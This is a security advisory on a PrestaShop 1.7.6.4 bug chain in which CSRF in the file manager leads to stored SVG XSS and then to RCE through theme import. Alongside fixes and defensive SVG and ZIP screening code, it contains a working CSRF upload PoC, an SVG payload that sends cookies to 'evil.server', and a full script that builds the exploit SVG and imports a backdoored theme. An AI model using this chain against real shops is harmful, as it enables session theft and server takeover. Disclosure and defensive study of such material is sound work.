Prestashop 1.7.6.4 XSS / CSRF / Remote Code Execution

  • Prestashop versions 1.7.6.4 and below suffer from remote code execution, cross-site request forgery, and cross-site scripting vulnerabilities.
    MD5 | e88f3fb2cabe4dd5fc52ac8955ab17bb

    ##########################################################################  
    #              Prestashop <= 1.7.6.4 Multiple Vulnerabilities            #  
    ##########################################################################  
    Author - Sivanesh Ashok | @sivaneshashok <https://twitter.com/sivaneshashok> | stazot.com
    Last Modified: 2020-04-11  
    Vendor       : https://www.prestashop.com/  
    Version      : <= 1.7.6.4  
    Tested on    : 1.7.6.4  
    --[ Table of Contents  
    00 - Introduction  
    01 - Exploit  
    02 - Cross-Site Request Forgery (CSRF)  
    02.1 - Exploitation  
    03 - Stored Cross-Site Scripting  
    03.1 - Exploitation  
    04 - Escalation to RCE  
    04.1 - Exploitation  
    05 - Solution  
    06 - Contact  
    --[ 00 - Introduction  
    Prestashop is an open source e-commerce solution written in PHP. This
    article is about the CSRF and XSS vulnerabilities I discovered and how they
    were chained and escalated to single-click RCE by an unauthenticated
    attacker.
    --[ 01 - Exploit  
    I wrote an exploit that chains the vulnerabilities described below to  
    achieve single-click RCE, as an unauthenticated attacker. It can be found  
    in the link below.  
    https://github.com/staz0t/exploits/blob/master/SA20200411_prestashop_csrf_to_rce.html  
    You will need a Prestashop theme ZIP file to achieve RCE. A simple theme
    can be downloaded from here - https://github.com/PrestaShop/classic-rocket
    Download the theme, add a PHP backdoor to the theme ZIP file and host the
    ZIP on a web server. Then edit the JS variables in the exploit, host it on a
    web page and send the link to the admin. Once the admin visits the web page,
    the PHP file is uploaded and can be reached at
    http://target.server/themes/{theme-name}/{php-file-name}.php
    --[ 02 - Cross-Site Request Forgery (CSRF)  
    An unauthenticated attacker can exploit this vulnerability to trick an
    authenticated user with 'Products Edit' permission into uploading files to
    the 'File Manager'. The application does not check for a CSRF token on the
    File Manager's upload endpoint, {adminurl}/filemanager/upload.php, which
    causes this issue.
    --[ 02.1 - Exploitation
    To exploit this vulnerability, an attacker crafts a CSRF webpage and
    tricks an authenticated user with 'Products Edit' permission into visiting
    the webpage.
    1. Create a webpage that automatically submits a POST upload request to the  
    file manager.  
    For example,  
    ----[ code segment ]----
    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
    <script>history.pushState('', '', '/')</script>
    <script>
    // Forged multipart upload to the File Manager endpoint. The victim's
    // browser attaches the admin session cookie because withCredentials is set.
    function submitRequest()
    {
    var xhr = new XMLHttpRequest();
    xhr.open("POST",
    "http:\/\/prestashop.localhost-windows.com\/admin501to49xz\/filemanager\/upload.php",
    true);
    // multipart/form-data is a CORS-safelisted content type, so no preflight is sent.
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
    xhr.withCredentials = true;
    // Body as upload.php expects it: empty path and path_thumb fields, then the file part.
    var body =
    "-----------------------------6487332036660663652470259777\r\n" +
    "Content-Disposition: form-data; name=\"path\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------6487332036660663652470259777\r\n" +
    "Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------6487332036660663652470259777\r\n" +
    "Content-Disposition: form-data; name=\"file\"; filename=\"csrfpoc.svg\"\r\n" +
    "Content-Type: image/svg+xml\r\n" +
    "\r\n" +
    "\x3csvg xmlns=\"http://www.w3.org/2000/svg\" /\x3e\r\n" +
    "\r\n" +
    "-----------------------------6487332036660663652470259777--\r\n";
    // Send the body byte-for-byte so the boundary lines are not re-encoded.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    }
    submitRequest();
    </script>
    </body>
    </html>
    ----[ code segment ]----
    2. Send the link of the webpage to the victim.
    The above code segment uploads csrfpoc.svg when the victim user visits the
    webpage that hosts this code. The request carries the victim's session
    cookie because of xhr.withCredentials, and multipart/form-data is a
    CORS-safelisted content type, so the browser sends it without a preflight.
    Browsers that default cookies to SameSite=Lax will not attach the session
    cookie to this cross-site POST, which limits the CSRF on its own; the
    upload endpoint itself still performs no token check.
    --[ 03 - Stored Cross-Site Scripting  
    An attacker can exploit this vulnerability to execute JavaScript code in
    the context of the victim. The vulnerability is in the 'File Manager'.
    Back-office users with 'Products Edit' permission can upload files with
    whitelisted extensions.
    By default, the following extensions are allowed to be uploaded in the File
    Manager.
    jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma,
    flv, webm
    As mentioned, SVG files are allowed, and SVG files can contain JavaScript
    code. This allows a back-office user with 'Products Edit' permission to
    run arbitrary JavaScript code in the context of any victim who opens the
    uploaded file.
    --[ 03.1 - Exploitation  
    An unauthenticated attacker can chain the previously explained CSRF with
    this vulnerability to trick an authenticated user with 'Products Edit'
    permission into uploading an SVG file with malicious JavaScript code.
    1. Create an SVG file with a JavaScript payload in it.
    For example,
    <svg xmlns="http://www.w3.org/2000/svg" onload="document.location='http://evil.server/?c='+document.cookie;" />
    This payload sends the victim's cookies (those not flagged HttpOnly, which
    is all document.cookie can read) to the attacker's server.
    2. Create a webpage that automatically submits a POST upload request with
    the contents of the malicious SVG file.
    3. Host the webpage and send the link to the victim with 'Products Edit'
    permission.
    4. When the victim opens the URL, the SVG file with the JavaScript payload
    gets uploaded to http://target.server/img/cms/evil.svg
    5. Send the SVG link to the target victim. When the victim opens the link,
    the victim's cookies get sent to the attacker. The script only runs when
    the SVG is opened as a document (navigated to directly, or embedded with
    <object> or <iframe>); an SVG referenced from an <img> tag does not execute
    script, which is why the link itself is sent to the victim.
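The following is an added example, not code from the advisory or from PrestaShop, of the kind of content check the File Manager would need in order to keep accepting SVG: an allow-list screen that flags the payload shapes this section relies on (event-handler attributes, script elements, javascript: URLs hidden behind character references). It tokenises the markup with regular expressions rather than a real XML parser, so treat it as a pre-filter in front of a proper sanitiser (for instance DOMPurify's SVG profile), not as the only control. The element allow-list and the sample inputs are my own.

```javascript
// Added example (not the advisory's or PrestaShop's code): an allow-list screen
// for uploaded SVGs. Regex tokenising, not XML parsing, so use it as a
// pre-filter in front of a real sanitiser, not as the only control.
const SVG_ALLOWED_ELEMENTS = new Set([
  'svg', 'g', 'defs', 'symbol', 'use', 'title', 'desc', 'metadata', 'a',
  'path', 'rect', 'circle', 'ellipse', 'line', 'polyline', 'polygon',
  'text', 'tspan', 'image', 'lineargradient', 'radialgradient', 'stop',
  'clippath', 'mask', 'pattern',
]);
const URL_ATTRIBUTES = new Set(['href', 'xlink:href', 'src']);

// Undo numeric and named character references so "j&#97;vascript:" is seen as written.
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&(amp|lt|gt|quot|apos);/g, (_, n) => named[n]);
}

// Returns the list of reasons to reject the file; an empty list means nothing was found.
function screenSvg(svgText) {
  const findings = [];
  if (/<!DOCTYPE[^>]*\[|<!ENTITY/i.test(svgText)) findings.push('internal DTD subset / entity declaration');
  if (/<\?xml-stylesheet/i.test(svgText)) findings.push('xml-stylesheet processing instruction');
  if (/<!\[CDATA\[/i.test(svgText)) findings.push('CDATA section');
  const tagRe = /<\s*([a-zA-Z][\w:.-]*)([^>]*?)\/?>/g;        // start tags only
  const attrRe = /([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;  // name="value" / name='value'
  let tag;
  while ((tag = tagRe.exec(svgText)) !== null) {
    const element = tag[1].toLowerCase();
    if (!SVG_ALLOWED_ELEMENTS.has(element)) findings.push(`element <${element}>`);
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const attrName = attr[1].toLowerCase();
      if (attrName.startsWith('on')) findings.push(`event handler ${attrName} on <${element}>`);
      if (!URL_ATTRIBUTES.has(attrName)) continue;
      // Strip whitespace and control characters that browsers ignore inside a scheme.
      const value = decodeEntities(attr[2] !== undefined ? attr[2] : attr[3]).replace(/[\s\x00-\x1f]/g, '');
      const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(value);
      if (!scheme) continue; // fragment (#id) or relative reference
      const ok = /^https?$/i.test(scheme[1]) || /^data:image\/(png|jpe?g|gif|webp)[;,]/i.test(value);
      if (!ok) findings.push(`${attrName} scheme ${scheme[1].toLowerCase()} on <${element}>`);
    }
  }
  return findings;
}

function isSafeSvg(svgText) {
  return screenSvg(svgText).length === 0;
}

// Constructed sample: the advisory's cookie-stealing payload is rejected, a plain rectangle passes.
const COOKIE_PAYLOAD = `<svg xmlns="http://www.w3.org/2000/svg" onload="document.location='http://evil.server/?c='+document.cookie;" />`;
console.log(screenSvg(COOKIE_PAYLOAD), isSafeSvg('<svg xmlns="http://www.w3.org/2000/svg"><rect width="8" height="8"/></svg>'));
```

Run it with node; the first value printed is the finding for the onload handler, the second is true. Whatever the screen does, the upload directory should additionally be served in a way that cannot execute script in the shop's origin (see the solution section).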
    --[ 04 - Escalation to Remote Code Execution  
    By targeting the admin, an attacker can gain RCE on the server. This is
    achieved through the 'Import Theme' functionality.
    --[ 04.1 - Exploitation
    The theme import functionality fetches a ZIP file and unpacks it into the
    themes/ directory, provided the ZIP has all the necessary theme files. The
    ZIP may also contain a PHP file, and the server will still unzip it into
    the themes/{theme-name} directory.
    An attacker can exploit this feature to upload a theme with a malicious PHP
    file and achieve RCE, using the previously explained CSRF and XSS bug
    chain.
    1. Create an SVG file with a JavaScript payload that does the following.
    1.1. Opens the 'Import Theme' page and fetches its CSRF token
    1.2. Sends a POST request to the theme upload endpoint with the link to
    the malicious ZIP file
    2. Create a webpage that exploits the CSRF to automatically submit a POST
    upload request to the file manager's upload endpoint to upload the
    malicious SVG file.
    3. Send the webpage's link to an authenticated user with 'Products Edit'
    permission (or the admin). This uploads the SVG file to the server at
    http://target.server/img/cms/exploit.svg
    4. Now send the uploaded SVG file's link to the admin. When the admin opens
    the link, the theme containing the PHP file gets imported, and the file
    can be reached at
    http://target.server/themes/{theme-name}/backdoor.php
    Putting all this together, an unauthenticated attacker can achieve
    single-click RCE by targeting the admin (SuperUser) of the shop. The token
    on the theme import form is no obstacle here: the SVG runs in the shop's
    origin, so it can read the token off the page and post it back.
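The following is an added example of the pattern behind steps 1.1 and 1.2 above; it is not the advisory's exploit (that is on the author's GitHub) and not PrestaShop code. The admin directory is taken from the PoC host, but the import page path, the endpoint the form posts to, the token field name and the ZIP URL field name are placeholders I assumed for illustration; the real values have to be read from the target's Import Theme form. The function that does the network calls is browser-only; the token extraction and body building are kept DOM-free so they can be checked outside a browser.

```javascript
// Added example, not the advisory's exploit: the JavaScript a stored SVG would
// carry so that the admin's own browser performs the theme import. Every path
// and field name in CONFIG is an ASSUMED placeholder; read the real ones from
// the target's Import Theme form before using this pattern.
const CONFIG = {
  adminBase: 'http://target.server/admin501to49xz', // admin directory, as in the PoC
  importPage: '/theme-import',                      // placeholder: page that holds the token
  importPost: '/theme-import',                      // placeholder: endpoint the form posts to
  tokenField: '_token',                             // placeholder: hidden token field name
  urlField: 'theme_url',                            // placeholder: field that takes the ZIP URL
  zipUrl: 'http://evil.server/classic-with-backdoor.zip', // attacker-hosted theme ZIP
};

// Read a hidden input's value out of raw HTML, tolerant of attribute order.
function extractToken(html, fieldName) {
  for (const tag of html.match(/<input\b[^>]*>/gi) || []) {
    const name = /\bname\s*=\s*"([^"]*)"/i.exec(tag);
    if (!name || name[1] !== fieldName) continue;
    const value = /\bvalue\s*=\s*"([^"]*)"/i.exec(tag);
    return value ? value[1] : null;
  }
  return null;
}

// Form body for the forged import. The token is replayed verbatim: script
// running in the shop's origin reads it from the page, so a per-form CSRF
// token does not stop a stored XSS chain.
function buildImportBody(cfg, token) {
  const params = new URLSearchParams();
  params.set(cfg.tokenField, token);
  params.set(cfg.urlField, cfg.zipUrl);
  return params.toString();
}

// Browser-only part: both requests ride on the admin's session cookie.
async function importThemeAsAdmin(cfg) {
  const page = await fetch(cfg.adminBase + cfg.importPage, { credentials: 'include' });
  const token = extractToken(await page.text(), cfg.tokenField);
  if (!token) throw new Error('token field not found on import page');
  return fetch(cfg.adminBase + cfg.importPost, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildImportBody(cfg, token),
  });
}

// The file the CSRF from section 02 would upload as exploit.svg: the three
// functions above inlined, plus a call that runs when the SVG is opened.
function buildExploitSvg(cfg) {
  const js = [extractToken, buildImportBody, importThemeAsAdmin]
    .map((fn) => fn.toString())
    .concat(`importThemeAsAdmin(${JSON.stringify(cfg)});`)
    .join('\n');
  return `<svg xmlns="http://www.w3.org/2000/svg"><script><![CDATA[\n${js}\n]]></script></svg>`;
}

console.log(buildExploitSvg(CONFIG));
```

As with the cookie-stealing SVG, the script only executes when the admin opens the uploaded file as a document, which is why the chain ends with sending the SVG link rather than embedding it somewhere. If the real import form posts multipart rather than urlencoded data, the body builder is the only part that changes.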
    --[ 05 - Solution  
    1. Implement CSRF protection on the {adminurl}/filemanager/upload.php endpoint.
    2. Disallow SVG upload in the File Manager, or validate the SVG file's
    contents before accepting the upload. Serving files under /img/ with
    Content-Disposition: attachment (or a Content-Security-Policy: sandbox
    header) also stops an uploaded SVG from running script in the shop's origin.
    3. Validate the theme ZIP before importing it: reject archives that contain
    PHP files (or any other server-executable file), and reject entry names
    that would escape the themes/ directory.
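The following is an added example of the third point, written by me and not taken from PrestaShop: it reads the ZIP's central directory (the authoritative index of the archive) and refuses the theme if any entry is server-side code. It goes a step beyond the text by also rejecting web-server configuration files and entry names that escape the theme directory, since the unpack step would otherwise write those under themes/ too. The sample archive is constructed in the block with a minimal stored-ZIP writer; the file names and contents are my own.

```javascript
// Added example (not PrestaShop code): inspect a theme ZIP's central directory
// before it is unpacked into themes/, and refuse archives that carry
// server-side code, web-server config, or paths that escape the theme dir.
const SIG_LOCAL = 0x04034b50, SIG_CENTRAL = 0x02014b50, SIG_EOCD = 0x06054b50;

// List entry names from the central directory (no zip library needed).
function listZipEntries(buf) {
  let eocd = -1; // the end-of-central-directory record sits at the end, possibly behind a comment
  for (let i = buf.length - 22; i >= Math.max(0, buf.length - 22 - 0xffff); i--) {
    if (buf.readUInt32LE(i) === SIG_EOCD) { eocd = i; break; }
  }
  if (eocd < 0) throw new Error('not a zip: no end-of-central-directory record');
  const count = buf.readUInt16LE(eocd + 10);
  let pos = buf.readUInt32LE(eocd + 16);
  const names = [];
  for (let n = 0; n < count; n++) {
    if (buf.readUInt32LE(pos) !== SIG_CENTRAL) throw new Error('corrupt central directory');
    const nameLen = buf.readUInt16LE(pos + 28);
    const extraLen = buf.readUInt16LE(pos + 30);
    const commentLen = buf.readUInt16LE(pos + 32);
    names.push(buf.toString('utf8', pos + 46, pos + 46 + nameLen));
    pos += 46 + nameLen + extraLen + commentLen;
  }
  return names;
}

// Extensions PHP-enabled servers execute; ".php." catches double extensions such
// as logo.php.png that some Apache AddHandler configurations still run.
const SERVER_CODE = /\.(php[0-9]?|phtml|phar|phps)$|\.php\./i;
const SERVER_CONFIG = /(^|\/)(\.htaccess|\.user\.ini|web\.config)$/i;

function screenThemeZip(buf) {
  const findings = [];
  for (const name of listZipEntries(buf)) {
    const path = name.replace(/\\/g, '/');
    if (path.startsWith('/') || /(^|\/)\.\.(\/|$)/.test(path)) findings.push(`path escape: ${name}`);
    if (SERVER_CODE.test(path)) findings.push(`server-side code: ${name}`);
    if (SERVER_CONFIG.test(path)) findings.push(`web server config: ${name}`);
  }
  return findings;
}

// --- constructed sample input: a minimal stored (uncompressed) ZIP writer ---
function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) {
    c ^= b;
    for (let k = 0; k < 8; k++) c = (c >>> 1) ^ (0xedb88320 & -(c & 1));
  }
  return (c ^ 0xffffffff) >>> 0;
}

function le(fields) { // [[byteWidth, value], ...] -> little-endian Buffer
  const buf = Buffer.alloc(fields.reduce((n, [w]) => n + w, 0));
  let off = 0;
  for (const [w, v] of fields) {
    if (w === 2) buf.writeUInt16LE(v, off); else buf.writeUInt32LE(v, off);
    off += w;
  }
  return buf;
}

function buildStoredZip(entries) {
  const locals = [], centrals = [];
  let offset = 0;
  for (const { name, data } of entries) {
    const n = Buffer.from(name, 'utf8'), d = Buffer.from(data), crc = crc32(d);
    locals.push(le([[4, SIG_LOCAL], [2, 20], [2, 0], [2, 0], [2, 0], [2, 0x21],
      [4, crc], [4, d.length], [4, d.length], [2, n.length], [2, 0]]), n, d);
    centrals.push(le([[4, SIG_CENTRAL], [2, 20], [2, 20], [2, 0], [2, 0], [2, 0], [2, 0x21],
      [4, crc], [4, d.length], [4, d.length], [2, n.length], [2, 0], [2, 0], [2, 0], [2, 0],
      [4, 0], [4, offset]]), n);
    offset += 30 + n.length + d.length;
  }
  const cd = Buffer.concat(centrals);
  const eocd = le([[4, SIG_EOCD], [2, 0], [2, 0], [2, entries.length], [2, entries.length],
    [4, cd.length], [4, offset], [2, 0]]);
  return Buffer.concat([...locals, cd, eocd]);
}

// A theme archive as an attacker might build it from classic-rocket (constructed sample).
function sampleThemeZip() {
  return buildStoredZip([
    { name: 'classic/config/theme.yml', data: 'name: classic\n' },
    { name: 'classic/templates/index.tpl', data: '{extends file="layouts/layout-both-columns.tpl"}\n' },
    { name: 'classic/backdoor.php', data: '<?php echo "backdoor"; ?>\n' },
    { name: 'classic/assets/img/logo.php.png', data: '<?php echo "double extension"; ?>\n' },
    { name: '../../.htaccess', data: 'AddType application/x-httpd-php .png\n' },
  ]);
}

console.log(screenThemeZip(sampleThemeZip()));
```

The check must run on the archive before anything is extracted; scanning the themes/ directory afterwards is too late, because the PHP file is already reachable at that point. A compressed (deflated) archive lists its entries the same way, since only the central directory is read here.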
    --[ 06 - Contact  
    Name   : Sivanesh Ashok  
    Twitter: @sivaneshashok <https://twitter.com/sivaneshashok>  
    Website: https://stazot.com  
    

    Source: packetstormsecurity.com
